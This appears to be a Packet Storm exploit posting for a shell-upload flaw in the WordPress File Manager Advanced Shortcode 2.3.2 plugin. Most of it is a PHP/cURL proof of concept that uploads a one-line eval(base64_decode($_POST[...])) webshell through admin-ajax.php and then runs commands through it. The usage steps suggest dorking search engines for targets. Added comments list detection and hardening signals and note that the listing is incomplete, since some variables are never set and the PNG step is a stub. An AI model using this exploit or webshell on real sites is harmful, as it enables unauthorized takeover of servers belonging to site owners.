
WordPress File Manager Advanced Shortcode 2.3.2 Code Injection / Shell Upload

WordPress File Manager Advanced Shortcode plugin version 2.3.2 suffers from a code injection vulnerability that allows for remote shell upload.

Packet Storm
=============================================================================================================================================
| # Title     : WordPress File Manager Advanced Shortcode 2.3.2 Code Injection Vulnerability                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |
| # Vendor    : https://advancedfilemanager.com/product/file-manager-advanced-shortcode-wordpress/                                          |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] uses the CURL to Allow remote command .
[+] Line 106 set your target .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php 
[+] PayLoad :
<?php
/**
 * Proof-of-concept client for the File Manager Advanced Shortcode 2.3.2
 * upload issue named in the advisory header. Despite its name, this is a
 * standalone PHP/cURL class, not a Metasploit Framework module.
 *
 * What the visible code does: it builds a multipart upload request for
 * /wp-admin/admin-ajax.php (action "fma_load_shortcode_fma_ui", cmd "upload")
 * carrying a file whose name ends in .php, then sends a follow-up POST to the
 * path where that file is expected to land.
 *
 * NOTE(review): the listing is not self-contained. $wpData and $uploadPath
 * are read but never assigned in the visible code, the constructor's $command
 * argument is unused, and injectPhpPayloadPng() is a stub by the author's own
 * comment. Read it as an illustration of the request shape, not as a verified
 * reproduction.
 *
 * Defender notes, derived from the request fields in this listing:
 *  - Web/WAF logs: POSTs to admin-ajax.php with action=fma_load_shortcode_fma_ui
 *    and cmd=upload whose upload[] part has a filename ending in .php, or the
 *    unusual part header "Content-Type: image/png, text/x-php".
 *  - File system: new .php files with 16-32 hex-character names (the default
 *    name generated here) in the plugin's upload location, and any later HTTP
 *    request to such a file.
 *  - File content: a one-line stub of the form eval(base64_decode($_POST[...]))
 *    keyed by a 16 hex-character field name (see exploit()).
 *  - Hardening: keep the plugin updated (this page names 2.3.2 as affected and
 *    gives no fixed version) and configure the web server so that files in
 *    upload directories are never executed as PHP.
 */
class MetasploitModule {
    // Base URL that sendRequest() prepends to every request path.
    private $targetUri;
    // File name used for the uploaded .php file.
    private $webshellName;
    // Read as an array with 'fmakey' and 'baseurl' keys; never assigned in this listing.
    private $wpData;
    // Read when building the form and the follow-up URL; never assigned in this listing.
    private $uploadPath;
    // Random field name that the uploaded stub reads from $_POST.
    private $postParam;
    // Second random field name; sent by executeCommand() alongside $postParam.
    private $getParam;

    /**
     * Stores the base URL and picks the file and field names.
     *
     * @param mixed $targetUri Base URL, concatenated with request paths in sendRequest().
     * @param mixed $webshell  Optional file name; any falsy value selects a random one.
     * @param mixed $command   Accepted but not used anywhere in the visible code.
     */
    public function __construct($targetUri, $webshell = null, $command = 'passthru') {
        $this->targetUri = $targetUri;
        // `?:` tests truthiness, so '' and '0' also fall back to the random name.
        $this->webshellName = $webshell ?: $this->generateRandomWebshellName();
        $this->postParam = $this->generateRandomString();
        $this->getParam = $this->generateRandomString();
    }

    /**
     * Returns a random file name: 8 to 16 random bytes hex-encoded
     * (16 to 32 hex characters) followed by ".php".
     */
    private function generateRandomWebshellName() {
        return bin2hex(random_bytes(rand(8, 16))) . '.php';
    }

    /**
     * Returns $length random bytes hex-encoded, i.e. 2 * $length characters
     * (16 with the default of 8).
     */
    private function generateRandomString($length = 8) {
        return bin2hex(random_bytes($length));
    }

    /**
     * Builds the multipart/form-data body for the upload request.
     *
     * Fields sent: reqid (empty), cmd=upload, target=l1_Lw,
     * action=fma_load_shortcode_fma_ui, _fmakey, path, and one upload[] file part.
     * NOTE(review): cmd/target/upload[] look like elFinder connector parameters
     * and l1_Lw like an elFinder volume/path hash - confirm against the plugin.
     *
     * @param mixed $pngWebshell Content placed in the file part.
     * @return array ['data' => body string, 'boundary' => boundary string]
     */
    private function getFormData($pngWebshell) {
        // Construct multipart form data
        // The boundary is only a part delimiter; md5(time()) is not used as a secret here.
        $boundary = md5(time());
        $formData = "--$boundary\r\n";
        $formData .= "Content-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n";
        $formData .= "--$boundary\r\n";
        $formData .= "Content-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n";
        $formData .= "--$boundary\r\n";
        $formData .= "Content-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n";
        $formData .= "--$boundary\r\n";
        // The AJAX action name is the most stable value to match on in request logs.
        $formData .= "Content-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n";
        $formData .= "--$boundary\r\n";
        // $this->wpData is never populated in this listing, so 'fmakey' has no value here.
        $formData .= "Content-Disposition: form-data; name=\"_fmakey\"\r\n\r\n{$this->wpData['fmakey']}\r\n";
        $formData .= "--$boundary\r\n";
        $formData .= "Content-Disposition: form-data; name=\"path\"\r\n\r\n{$this->uploadPath}\r\n";
        $formData .= "--$boundary\r\n";
        // The file part pairs a .php file name with a two-value Content-Type header;
        // that combination is a useful upload-filter and detection signal.
        $formData .= "Content-Disposition: form-data; name=\"upload[]\"; filename=\"{$this->webshellName}\"\r\n";
        $formData .= "Content-Type: image/png, text/x-php\r\n\r\n" . $pngWebshell . "\r\n";
        $formData .= "--$boundary--\r\n";
        return ['data' => $formData, 'boundary' => $boundary];
    }

    /**
     * POSTs the multipart body to /wp-admin/admin-ajax.php and reports whether
     * the JSON reply lists the file under added[0].name.
     *
     * @param mixed $pngWebshell Content passed through to getFormData().
     * @return bool true only when the reply names the uploaded file; false otherwise,
     *              including when the reply is not JSON.
     */
    private function uploadWebshell($pngWebshell) {
        $formData = $this->getFormData($pngWebshell);
        $response = $this->sendRequest('POST', "/wp-admin/admin-ajax.php", $formData['data'], [
            "Content-Type: multipart/form-data; boundary={$formData['boundary']}"
        ]);
        // Handle response and check for upload success
        $responseData = json_decode($response, true);
        // Loose (==) comparison of the returned name with the requested one.
        if (isset($responseData['added'][0]['name']) && $responseData['added'][0]['name'] == $this->webshellName) {
            return true;
        }
        
        return false;
    }

    /**
     * Stub: returns $payload unchanged. No image data is produced in this listing.
     */
    private function injectPhpPayloadPng($payload) {
        // Here you should inject PHP code into a PNG file
        // This is just a placeholder for the actual implementation
        return $payload; // Placeholder for the injected PNG
    }

    /**
     * Sends a POST to the expected location of the uploaded file with two form
     * fields: $getParam => 'passthru' and $postParam => base64 of $cmd.
     * The response is discarded. Both fields travel in the POST body, because
     * sendRequest() passes the array to CURLOPT_POSTFIELDS.
     *
     * Defender note: a request to a .php file in an upload path carrying a
     * base64-encoded form field is worth alerting on.
     */
    private function executeCommand($cmd) {
        $payload = base64_encode($cmd);
        $this->sendRequest('POST', "/{$this->wpData['baseurl']}/{$this->uploadPath}/{$this->webshellName}", [
            $this->getParam => 'passthru', // replace with the command function
            $this->postParam => $payload
        ]);
    }

    /**
     * Thin cURL wrapper: requests $this->targetUri . $uri with the given method
     * and headers, attaching $data as the body only for POST.
     *
     * @return mixed curl_exec() result: the response body as a string
     *               (CURLOPT_RETURNTRANSFER is set) or false on failure. No timeout
     *               is set and no error or HTTP status is inspected.
     */
    private function sendRequest($method, $uri, $data, $headers = []) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $this->targetUri . $uri);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        if ($method == 'POST') {
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        }
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    /**
     * Entry point: builds the one-line PHP stub, passes it through the stub
     * injectPhpPayloadPng(), attempts the upload and, when the upload is
     * reported as successful, sends one follow-up request.
     * Prints "Failed to upload webshell." otherwise. Returns nothing.
     */
    public function exploit() {
        // Check for vulnerabilities and upload webshell logic
        // The file content is a single eval(base64_decode($_POST[<16 hex chars>])) line;
        // that shape is what to search uploaded files for during incident response.
        $payload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";
        $pngWebshell = $this->injectPhpPayloadPng($payload);
        if ($this->uploadWebshell($pngWebshell)) {
            $this->executeCommand('whoami'); // Replace 'whoami' with your desired command
        } else {
            echo "Failed to upload webshell.";
        }
    }
}

// Usage example
// 'http://target-uri.com' is the placeholder host from the original listing.
$exploit = new MetasploitModule('http://target-uri.com');
$exploit->exploit();
Greetings to :
=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
